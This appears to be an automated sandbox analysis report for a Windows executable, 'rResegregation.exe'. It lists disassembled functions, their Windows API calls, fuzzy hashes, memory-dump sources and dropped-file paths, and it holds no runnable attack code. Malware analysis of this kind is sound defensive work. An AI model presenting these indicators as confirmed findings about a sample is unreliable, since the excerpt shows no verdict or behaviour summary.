                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_10000000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                  • Instruction ID: 4f82052a8ee677216feeb46ba648c84afb962adc58c95b92ee0d34447feb5494
                                                                  • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                  • Instruction Fuzzy Hash: B5F09BF19092A0DEF360DF688CC4B063FE4E3983D5B03892AE358F6269EB7441448B19
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004022C7 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022FA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileString
                                                                  • String ID:
                                                                  • API String ID: 1096422788-0
                                                                  • Opcode ID: 89032baceb3f6f114b0488ce247a90a0ba58f85f764d13967e355b5ac32f42df
                                                                  • Instruction ID: 39f1f9859769fa242ff58571ca275c021542d1dfaf63d46caa25723865460d27
                                                                  • Opcode Fuzzy Hash: 89032baceb3f6f114b0488ce247a90a0ba58f85f764d13967e355b5ac32f42df
                                                                  • Instruction Fuzzy Hash: 66E08630A04214BFDB20EFA08D09BAE3669BF11714F10403AF9917B0D2EAB849419B1D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00403F3D Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageA.USER32(000103C0,00000000,00000000,00000000), ref: 00403F4F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: fe9c5fbe97cae241cde84ce22785a5e9dbc0b02d0b9d793388d9d8a90b417260
                                                                  • Instruction ID: 9b9c13dac3056517ae90cab9ba0900707a7cdbddb9b58ac83e38e750941f619c
                                                                  • Opcode Fuzzy Hash: fe9c5fbe97cae241cde84ce22785a5e9dbc0b02d0b9d793388d9d8a90b417260
                                                                  • Instruction Fuzzy Hash: 39C04C71A442016AEB219B649D49F067BA8A751701F1594257315A50E0D674E410D66D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00403F26 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageA.USER32(00000028,?,00000001,00403D57), ref: 00403F34
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: c60a5741adf6fd17905679b15365177ec5dfd851c523a537735145c0d793b3ca
                                                                  • Instruction ID: bce073d95cda9f80ae5a70f3258e8641f0ad27ed80faf677ac8523eeabb20274
                                                                  • Opcode Fuzzy Hash: c60a5741adf6fd17905679b15365177ec5dfd851c523a537735145c0d793b3ca
                                                                  • Instruction Fuzzy Hash: F7B09235585200AAEA224B40DD09F457A62A7A4701F008064B210240F0CAB200A0DB19
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004030A4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,00032BE4), ref: 004030B2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer
                                                                  • String ID:
                                                                  • API String ID: 973152223-0
                                                                  • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                  • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                  • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                  • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00403F13 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(?,00403CF0), ref: 00403F1D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CallbackDispatcherUser
                                                                  • String ID:
                                                                  • API String ID: 2492992576-0
                                                                  • Opcode ID: 0fd0461592f2d81c1c03ce05c628ae056ab63dad8406c1f23e4af249cfc5fe4d
                                                                  • Instruction ID: 7c635d8461ea366e4ce50998120561f43c0f0a4d26a99d582f7a8baadb7aa675
                                                                  • Opcode Fuzzy Hash: 0fd0461592f2d81c1c03ce05c628ae056ab63dad8406c1f23e4af249cfc5fe4d
                                                                  • Instruction Fuzzy Hash: 98A00176808101EBCB029B50FE08D4ABF62ABA4709B12D426E25594174D6365871FF2A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004057A9 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharNextA.USER32(?,004031D7,"C:\Users\user\Desktop\rResegregation.exe",00000020), ref: 004057B6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext
                                                                  • String ID:
                                                                  • API String ID: 3213498283-0
                                                                  • Opcode ID: 34075671c2b15bfe90313587f721bfb83bbc5626d38128025375f4e5ae623440
                                                                  • Instruction ID: af04ccf7b047eddc6f07bfa5d2d4e993f0f495a442af33782379f12d099718e5
                                                                  • Opcode Fuzzy Hash: 34075671c2b15bfe90313587f721bfb83bbc5626d38128025375f4e5ae623440
                                                                  • Instruction Fuzzy Hash: 35C08C2850D780E7E6214720802496B7FF4EB92700F68C4AEF4C1A3251C238AC00AB2B
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Non-executed Functions

                                                                  Function 004048A2 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003F9), ref: 004048BA
                                                                  • GetDlgItem.USER32(?,00000408), ref: 004048C5
                                                                  • GlobalAlloc.KERNEL32(00000040,00000003), ref: 0040490F
                                                                  • LoadBitmapA.USER32(0000006E), ref: 00404922
                                                                  • SetWindowLongA.USER32(?,000000FC,00404E99), ref: 0040493B
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040494F
                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404961
                                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404977
                                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404983
                                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404995
                                                                  • DeleteObject.GDI32(00000000), ref: 00404998
                                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049C3
                                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049CF
                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A64
                                                                  • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A8F
                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AA3
                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404AD2
                                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404AE0
                                                                  • ShowWindow.USER32(?,00000005), ref: 00404AF1
                                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404BEE
                                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C53
                                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C68
                                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C8C
                                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CAC
                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404CC1
                                                                  • GlobalFree.KERNEL32(?), ref: 00404CD1
                                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D4A
                                                                  • SendMessageA.USER32(?,00001102,?,?), ref: 00404DF3
                                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E02
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404E22
                                                                  • ShowWindow.USER32(?,00000000), ref: 00404E70
                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00404E7B
                                                                  • ShowWindow.USER32(00000000), ref: 00404E82
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                  • String ID: $M$N
                                                                  • API String ID: 1638840714-813528018
                                                                  • Opcode ID: f2b7aa1e677df4c75b347a9eeeab381988bf86340d3158c8b8f5eab98d7d410a
                                                                  • Instruction ID: 76d2e208bb82396193868b8099a6daa05122b73eb358a4a137ee08f8801950ae
                                                                  • Opcode Fuzzy Hash: f2b7aa1e677df4c75b347a9eeeab381988bf86340d3158c8b8f5eab98d7d410a
                                                                  • Instruction Fuzzy Hash: F1026CB0900209AFEB14DF94DD85AAE7BB9FB84314F10813AF610BA2E1D7789D51CF58
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040432F Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040437E
                                                                  • SetWindowTextA.USER32(00000000,?), ref: 004043A8
                                                                  • SHBrowseForFolderA.SHELL32(?,0079D918,?), ref: 00404459
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404464
                                                                  • lstrcmpiA.KERNEL32(Call,0079E540), ref: 00404496
                                                                  • lstrcatA.KERNEL32(?,Call), ref: 004044A2
                                                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044B4
                                                                    • Part of subcall function 004054E6: GetDlgItemTextA.USER32(?,?,00000400,004044EB), ref: 004054F9
                                                                    • Part of subcall function 00405F77: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\rResegregation.exe",76483410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FCF
                                                                    • Part of subcall function 00405F77: CharNextA.USER32(?,?,?,00000000), ref: 00405FDC
                                                                    • Part of subcall function 00405F77: CharNextA.USER32(?,"C:\Users\user\Desktop\rResegregation.exe",76483410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FE1
                                                                    • Part of subcall function 00405F77: CharPrevA.USER32(?,?,76483410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FF1
                                                                  • GetDiskFreeSpaceA.KERNEL32(0079D510,?,?,0000040F,?,0079D510,0079D510,?,00000001,0079D510,?,?,000003FB,?), ref: 00404572
                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040458D
                                                                    • Part of subcall function 004046E6: lstrlenA.KERNEL32(0079E540,0079E540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404601,000000DF,00000000,00000400,?), ref: 00404784
                                                                    • Part of subcall function 004046E6: wsprintfA.USER32 ref: 0040478C
                                                                    • Part of subcall function 004046E6: SetDlgItemTextA.USER32(?,0079E540), ref: 0040479F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: @y$A$C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet$Call
                                                                  • API String ID: 2624150263-2851418435
                                                                  • Opcode ID: 4367221acb27fbafda39f30d3b729b6150a881a92f1b2ab0f00bcccaea6e9431
                                                                  • Instruction ID: dc70ebfb722856edf20ca9fe518129045a13840cef36c67e0ec65d3b8ea71268
                                                                  • Opcode Fuzzy Hash: 4367221acb27fbafda39f30d3b729b6150a881a92f1b2ab0f00bcccaea6e9431
                                                                  • Instruction Fuzzy Hash: 69A182B1900208ABDB11EFA5DC45BAF77B8EF85314F10843BF601B62D1D77C9A418B69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 10001A5D Relevance: 20.0, APIs: 13, Instructions: 540stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                  • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 10001B67
                                                                  • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                                                  • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                                                  • GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                  • GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                  • GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                                                  • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28770977477.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                  • Associated: 00000000.00000002.28770951337.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28771003199.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28771028957.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_10000000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$lstrcpy$Alloc
                                                                  • String ID:
                                                                  • API String ID: 4227406936-0
                                                                  • Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                  • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                                                                  • Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                  • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040205E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\brummedes\janthinidae\Uhyre, xrefs: 0040211D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
